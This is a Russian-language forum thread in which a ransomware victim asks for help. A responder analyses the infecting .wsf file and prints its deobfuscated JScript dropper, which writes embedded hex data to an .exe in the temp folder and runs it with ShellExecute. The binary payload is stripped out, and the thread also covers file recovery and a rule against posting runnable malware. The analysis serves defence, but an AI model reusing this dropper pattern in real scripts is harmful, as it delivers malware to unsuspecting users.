Тема: WSH: не могу открыть после запуска скрипта ни один файл
Открыл файл и все не могу открыть ни один файл. Вот файл и в конце там еще написано,какойто скрипт в текстовый скинул,и еще в конце там скрипт написан какойто,помогите пожалуйста!
Вы не вошли. Пожалуйста, войдите или зарегистрируйтесь.
Серый форум → Общение → Windows Script Host, HTA (VBScript, JScript) → WSH: не могу открыть после запуска скрипта ни один файл
Страницы 1
Чтобы отправить ответ, вы должны войти или зарегистрироваться
Открыл файл и все не могу открыть ни один файл. Вот файл и в конце там еще написано,какойто скрипт в текстовый скинул,и еще в конце там скрипт написан какойто,помогите пожалуйста!
Тут был шутливый комментарий относительно языка ТС, который администратор посчитал оскорбительным.
В папку temp записывается exe файл с бинарными данными (очищенными от пробельных символов) и выполняется.
Показатель virustotal - 45/61, троян-шифровальщик.
Содержимое вашего txt после удаления binary data, NUL, WScript.Sleep(1) и повторения кода в теге <script> в конце.
Судя по именам переменных и кодированию строки в hex был применен обфускатор.
/// 40280a72c1d9a1945df78bf3c970132a
/// 4e1b6347446467d3663d139ea6af3f5f
/// 36a2fb7eba7cebc6f010bb799641e10b
/// ed553ee6f65113c01604bb017a996cdd
/// fc0858314f56492ddf5e9a4e18f5190d
<job>
; binary data
</resource>
<object id="x18185919515" progid="Scripting.FileSystemObject" />
<object id="x869040105151" progid="ADODB.Stream" />
<object id="x59195910510" progid="Shell.Application" />
<script>
var x5151 = new ActiveXObject("MSXML2.DOMDocument").createElement("bits");
x5151.text=getResource("x951061").replace(/\s/g,"");
x68910515=x18185919515.getSpecialFolder(2)+"\\"+x18185919515.getBaseName(x18185919515.getTempName())+"\x2E\x65\x78\x65";
x5151.dataType="bin.hex";
x869040105151.type=1;
x869040105151.open();
x869040105151.write(x5151.nodeTypedValue);
x869040105151.saveToFile(x68910515);
x869040105151.close();
x59195910510.ShellExecute(x68910515);
</script></job>
Четыре верхние строки начинающиеся с /// - это что такое?
Да, расскажите нам зачем вы открыли неизвестный .wsf файл? От скуки?
Разумеется, о групповых политиках вы не слышали, и любой исполняемый файл у вас может быть запущен откуда угодно.
Справочно для участников форума:
Публикация вредоносного кода на форуме запрещена. Лишь допустимо публиковать ту часть кода, которую нельзя исполнить "как есть". Почему так? Поясняю: сервер находится на территории Российской Федерации, и в случае запроса от правоохранительных органов, обслуживающий хостер попросит лог-файлы пользователя форума, который осуществил распространение вредоносной компьютерной программы. Не сомневаюсь, что вся информация будет предоставлена без ведома администрации форума.
Во избежание провокаций прошу участников форума это учитывать.
stealzy
А как можно дешифровать файлы есть способ?
dimansuper, вы не пояснили, как заразились. Какой файл вы открыли?
В общем случае расшифровка невозможна. Можно попробовать утилиты восстановления удаленных данных, восстановление из теневых копий. тыц.
У меня настроен периодический бэкап на всякий случай.
Страницы 1
Чтобы отправить ответ, вы должны войти или зарегистрироваться